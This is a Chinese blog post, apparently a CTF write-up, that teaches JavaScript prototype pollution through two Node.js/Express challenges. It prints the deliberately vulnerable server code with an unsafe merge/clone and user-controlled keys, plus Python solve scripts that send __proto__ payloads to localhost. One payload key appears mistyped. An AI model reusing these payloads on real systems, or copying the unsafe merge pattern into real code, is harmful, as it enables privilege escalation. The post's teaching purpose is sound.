网络安全-原型链污染

已于 2024-09-11 17:42:46 修改
阅读量949 收藏 6
点赞数 9
分类专栏: 网络安全 文章标签: 原型模式
于 2024-09-10 16:50:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/142098934
版权

目录

目录

一、简单介绍一下原型链

二、举个例子

三、那原型链污染是什么呢

四、我们来看一道题-hackit 2018

4.1 环境

4.2开始解题

4.3 解答:

五、我们来看第二道题

5.1补充知识点JSON.parse

5.2继续解题

一、简单介绍一下原型链

JavaScript 常被描述为一种基于原型的语言 (prototype-based language)——每个对象拥有一个原型对象,对象以其原型为模板、从原型继承方法和属性。原型对象也可能拥有原型,并从中继承方法和属性,一层一层、以此类推。这种关系常被称为原型链 (prototype chain)。

二、举个例子

描述一下:

function Father() {
    this.first_name = 'Donald'
    this.last_name = 'Trump'
}

function Son() {
    this.first_name = 'Melania'
}

Son.prototype = new Father()

let son = new Son()
console.log(`Name: ${son.first_name} ${son.last_name}`)

Son类继承了Father类的last_name属性,最后输出的是Name: Melania Trump

总结一下,对于对象son,在调用son.last_name的时候,实际上JavaScript引擎会进行如下操作:

  1. 在对象son中寻找last_name

  2. 如果找不到,则在son.__proto__中寻找last_name

  3. 如果仍然找不到,则继续在son.__proto__.__proto__中寻找last_name

  4. 依次寻找,直到找到null结束。比如,Object.prototype__proto__就是null

三、那原型链污染是什么呢

foo.__proto__指向的是Foo类的prototype。那么,如果我们修改了foo.__proto__中的值,是不是就可以修改Foo类呢?

我们做一个简单的实验

// foo是一个简单的JavaScript对象
let foo = {bar: 1}

// foo.bar 此时为1
console.log(foo.bar)

// 修改foo的原型(即Object)
foo.__proto__.bar = 2

// 由于查找顺序的原因,foo.bar仍然是1
console.log(foo.bar)

// 此时再用Object创建一个空的zoo对象
let zoo = {}

// 查看zoo.bar
console.log(zoo.bar)

结果: 

原因也显而易见:因为前面我们修改了foo的原型foo.__proto__.bar = 2,而foo是一个Object类的实例,所以实际上是修改了Object这个类,给这个类增加了一个属性bar,值为2。

后来,我们又用Object类创建了一个zoo对象let zoo = {},zoo对象自然也有一个bar属性了。

那么,在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染

四、我们来看一道题-hackit 2018

4.1 环境

我们将代码复制到js文件中,随便写个js,之后在官网下载node.js

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

写一个相应的js拉取包,如下package.json

{
    "name": "my-node-app",
    "version": "1.0.0",
    "description": "A simple Node.js app for tic-tac-toe game with express, hbs, and md5.",
    "main": "app.js",
    "scripts": {
      "start": "node app.js"
    },
    "dependencies": {
      "body-parser": "^1.20.2",
      "express": "^4.18.2",
      "hbs": "^4.2.0",
      "md5": "^2.3.0",
      "morgan-body": "^2.6.9"
    },
    "author": "",
    "license": "ISC"
  }

 之后换源为淘宝源后拉取相应的npm包

 

之后启动它就会自己监听到3000端口了

4.2开始解题

它定义了一个空数组然后给了三个null

继续分析,获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在 ,三个条件不符合的情况下就会给你返回一个Forbidden

解决方法:如果还有一个数组可以在admintoken值之前修改它祖先的值,而这个user没有值,但是它可以往上找,使得admintoken有值,自然就造成了原型链污染

那我们就需要去找用户可控的点,那找到了body,row,col,如何利用?

使用方法就是data得有值,而我们通过定位metrix发现它也是一个数组,user也是一个数组,那很明显在metrix上定义的原型链,user肯定可以找到,那现在如何在原型链定义

下面我们先本地测试一下:很明显我们将第一个属性放到row=__proto__,第二个属性col=admintoken,约等于我们没用点去取,而是用了数组

4.3 解答:

import requests
import json

url1 = "http://127.0.0.1:3000/api"
url2 = "http://127.0.0.1:3000/admin?querytoken=a3c23537bfc1e2da4a511661547d65fb"

s = requests.session()

headers = {"Content-Type": "application/json"}
data1 = {"row":"__proto__","col":"admintoken","data":"sunsec"}

res1 = s.post(url1, headers=headers, data=json.dumps(data1))
res2 = s.get(url2)

print(res2.text)

五、我们来看第二道题

'use strict';

const express = require('express');
const bodyParser = require('body-parser')
const cookieParser = require('cookie-parser');
const path = require('path');


const isObject = obj => obj && obj.constructor && obj.constructor === Object;

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

function clone(a) {
    return merge({}, a);
}

// Constants
const PORT = 8080;
const HOST = '0.0.0.0';
const admin = {};

// App
const app = express();
app.use(bodyParser.json())
app.use(cookieParser());

app.use('/', express.static(path.join(__dirname, 'views')));
app.post('/signup', (req, res) => {
    var body = JSON.parse(JSON.stringify(req.body));  {"__proto__": {"admin":1}}
    var copybody = clone(body)
    if (copybody.name) {
        res.cookie('name', copybody.name).json({
            "done": "cookie set"
        });
    } else {
        res.json({
            "error": "cookie not set"
        })
    }
});
app.get('/getFlag', (req, res) => {
    var аdmin = JSON.parse(JSON.stringify(req.cookies))
    if (admin.аdmin == 1) {
        res.send("hackim19{}");
    } else {
        res.send("You are not authorized");
    }
});
app.listen(PORT, HOST);
console.log(`Running on http://${HOST}:${PORT}`);

看到这两个函数,原型链污染很容易出现的两个函数merge和clone,而这段代码的意思大致是,如果前后a,b出现相同的字段,那么后者会将前者去进行一个覆盖

merge 函数作用是进行对象的合并,其中涉及到了对象的赋值,且键值可控,这样就可以触发原形链污染了

我们看一个例子

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
    <script>
        const isObject = obj => obj && obj.constructor && obj.constructor === Object;

        function merge(a, b) {
            for (var attr in b) {
                if (isObject(a[attr]) && isObject(b[attr])) {
                    merge(a[attr], b[attr]);
                } else {
                    a[attr] = b[attr];
                }
            }
            return a
        }

        function clone(a) {
            return merge({},a);
        }

        var test1 = { "name": "heike", "__proto__": { "admin": 1 } }

        clone(test1)

        var test2 = {}

        console.log(test2.admin)
    </script>
</body>

</html>

 我们会发现运行后直接undefined,根本没成功,我们可以下断点调试看看

单步进来name=“heike”

经过循环之后走到了这里

接下来a变成heike,b也变成heike,但是test又变成admin,那自然我们污染不了,那自然是undefined

原来我们在创建字典的时候,__proto__,不是作为一个键名,而是已经作为__proto__给其父类进行赋值了,所以在test.__proto__中才有admin属性,但是我们是想让__proto__作为一个键名的.

那应该怎么办呢?可以使用 JSON.parse

5.1补充知识点JSON.parse

在实际应用中,哪些情况下可能存在原型链能被攻击者修改的情况呢?

我们思考一下,哪些情况下我们可以设置__proto__的值呢?其实找找能够控制数组(对象)的“键名”的操作即可:

  • 对象merge

  • 对象clone(其实内核就是将待操作的对象merge到一个空对象中)

以对象merge为例,我们想象一个简单的merge函数:

function merge(target, source) {
    for (let key in source) {
        if (key in source && key in target) {
            merge(target[key], source[key])
        } else {
            target[key] = source[key]
        }
    }
}

在合并的过程中,存在赋值的操作target[key] = source[key],那么,这个key如果是__proto__,是不是就可以原型链污染呢?

我们用如下代码实验一下:

let o1 = {}
let o2 = {a: 1, "__proto__": {b: 2}}
merge(o1, o2)
console.log(o1.a, o1.b)
​
o3 = {}
console.log(o3.b)

结果是,合并虽然成功了,但原型链没有被污染:

这是因为,我们用JavaScript创建o2的过程(let o2 = {a: 1, "__proto__": {b: 2}})中,__proto__已经代表o2的原型了,此时遍历o2的所有键名,你拿到的是[a, b]__proto__并不是一个key,自然也不会修改Object的原型。

那么,如何让__proto__被认为是一个键名呢?

我们将代码改成如下:

let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)
​
o3 = {}
console.log(o3.b)

可见,新建的o3对象,也存在b属性,说明Object已经被污染:

这是因为,JSON解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”,所以在遍历o2的时候会存在这个键。

merge操作是最常见可能控制键名的操作,也最能被原型链攻击,很多常见的库都存在这个问题。

5.2继续解题

启动环境,访问

给出payload

import requests
import json

url1 = "http://127.0.0.1:8080/signup"
url2 = "http://127.0.0.1:8080/getFlag"

s = requests.session()

headers = {"Content-Type": "application/json"}
data1 = {"__proto": {"admin": 1}}

s.post(url1, headers=headers, json=data1)
res = s.get(url2)
print(res.text)

最终得到答案

 

凌晨五点的星
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全】JavaScript原链型污染
等风来
05-27 963
在 JavaScript 中,使用原型继承模型与许多其他语言所采用的基于类的继承模型有着明显的区别。在 JavaScript 中,对象是由一组称为“属性”的键值对构成的集合。举例来说,可以定义一个包含用户名和用户标识的 user 对象
Web安全——node.js原型链污染
m0_61506558的博客
01-20 1875
js 是由对象组成的,对象与对象之间存在着继承关系。每个对象都有一个指向它的原型的内部链接,而这个原型对象又有他自己的原型,直到 null 为止整体看来就是多个对象层层继承,实例对象的原型链接形成了一条链,也就是 js 的原型链。在 js 中每个函数都有一个属性,而每个对象中也有一个属性用来指向实例对象的原型。
网络安全--原型链污染
m0_69435261的博客
08-02 1455
在对象son中寻找last_name如果找不到,则在中寻找last_name如果仍然找不到,则继续在中寻找last_name依次寻找,直到找到null结束。比如,的__proto__就是null。
安全基础 --- 原型链污染
weixin_62443409的博客
09-05 6750
prototype:一个类的属性,所有类对象在实例化的时候会拥有prototype中的属性和方法__proto__:一个对象的__proto__属性,指向这个对象所在的类的prototype属性如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染
2024年最新安全基础 --- 原型链污染
2401_84302722的博客
05-03 712
如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染
2024年网络安全最全安全基础 --- 原型链污染
2401_84265571的博客
05-01 62
如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。
渗透攻击方法:原型链污染
txtxla的博客
08-05 954
在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险.
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 962
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
"NFT-IoT医药链:基于区块链和NFT的药品追溯系统
沙特国王大学学报NFT-IoT医药链:基于区块链和不可替代代币(NFT)的物联网药品追溯系统Mariem Turkia,d,Saoussen Cheikhrouhoub,Bouthaina Dammakc,MounaBaklaud,Rawya Marsb,Afef DhahbicaISIMG,Gabes大学...
95. UE5 GAS RPG 实现创建多段飞弹攻击敌人
现在学习也不晚
09-11 626
从这篇开始,我们将实现一些技能,比如多段火球术,闪电链等等。在这一篇里,我们先实现多段火球术,技能可以通过配置发射出多个火球术进行攻击。
二十三种模式之原型模式(类比制作陶器更好理解一些)
apple_64847327的博客
09-11 1093
原型模式是一种创建型设计模式,它允许一个对象在创建另一个可定制的对象,而无需知道如何创建的细节。这种模式通过复制现有的对象来创建新的实例,而不是新建一个。原型模式的主要优点是它可以避免直接创建对象的开销,特别是当对象创建过程复杂或耗时时。(将原型模式融入生活,更好理解)想象一下,你正在制作陶器。你有一个原始的陶器模型,你可以通过复制这个模型来创建许多相似的陶器。这个过程不需要从头开始制作每一个陶器,而是通过复制一个已经存在的模型来快速创建新的陶器。
设计模式-原型模式
qq_40840571的博客
09-07 1492
但是这种实现方法涉及到递归遍历的问题,也就是说如果parent下面还有指针对象,又或者parent的兄弟属性还有其他的指针对象,那么这种实现方法将会变得非常复杂。原型模式是一种创建对象的设计模式,主要通过复制现有对象来创建新对象,而不是通过实例化新对象的类。可以看到上面两种方法的实现,都需要类对象的首字母开头大写,这样可能会有参数泄漏的风险,下面可以看看反射的实现,比较复杂。可以看到在创建prototype对象的基础上,可以快速的初始化其他两个对象。如果不包含这类属性,是不会存在问题的。
JS面试真题 part2
yolo
09-06 1002
6、typeof 与 instanceof 区别 7、JavaScript原型,原型链?有什么特点 8、说说你对作用域链的理解 9、谈谈this对象的理解 10、说说new操作符具体干了什么
mybatisplus sql查询 TableField typeHandler
juziaixiao的博客
09-11 314
<resultMap id="getListByUserMap" type="com.race.domain.UserFormEntity"> <result property="id" column="id" jdbcType="VARCHAR"/> <result property="formKey" column="form_key" jdbcType="VARCHAR"/> <result property="
程序设计竞赛题册生成.zip
09-11
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
海康威视SDK实例QtDemo显示NVR视频窗口(Linux+Qt)
09-11
在《海康威视客户端iVMS-4200连接NVR》 https://blog.csdn.net/chentuo2000/article/details/119298486 一文中我们通过海康威视客户端iVMS-4200连接NVR。 本文我们通过海康SDK连接NVR。
Proteus是英国Lab Center Electronics公司出版的EDA工具软件,是一款功能强大的电子电路仿真和物理特性
09-11
proteusProteus是英国Lab Center Electronics公司出版的EDA工具软件,是一款功能强大的电子电路仿真和物理特性模拟软件,广泛应用于电子工程师和教育者之间。以下是关于Proteus的详细介绍: 一、功能特点 原理图设计:Proteus提供了智能原理图设计功能,拥有丰富的器件库,包含超过27000种元器件,可方便地创建新元件,并通过模糊搜索快速定位所需器件。 电路仿真:该软件支持从原理图布图到代码调试,再到单片机与外围电路协同仿真的全过程。其混合仿真功能基于工业标准SPICE3F5,可实现数字/模拟电路的混合仿真,拥有超过27000个仿真器件,并可通过内部原型或使用厂家的SPICE文件自行设计仿真器件。 单片机协同仿真:Proteus支持多种主流 文心大模型3.5生成
springboot基于大数据的音乐数据可视化分析系统毕业论文.docx
最新发布
09-11
springboot基于大数据的音乐数据可视化分析系统毕业论文.docx
ctfshow 原型链污染
10-14
好的,你的问题是关于原型链污染的。原型链污染是一种攻击方式,通过修改目标对象的原型链来实现攻击目的。攻击者可以通过修改原型链来篡改对象的属性或方法,从而达到攻击的目的。 例如,攻击者可以通过修改Object.prototype来污染整个JavaScript环境,使得所有对象都受到影响。攻击者还可以通过修改特定对象的原型链来实现特定的攻击目的,比如窃取用户的敏感信息。 为了防止原型链污染攻击,开发者应该遵循以下几个原则: 1. 不要轻易地修改Object.prototype或其他内置对象的原型链。 2. 使用Object.create(null)创建纯净的对象,避免继承Object.prototype带来的风险。 3. 使用Object.freeze()冻结对象,避免被篡改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值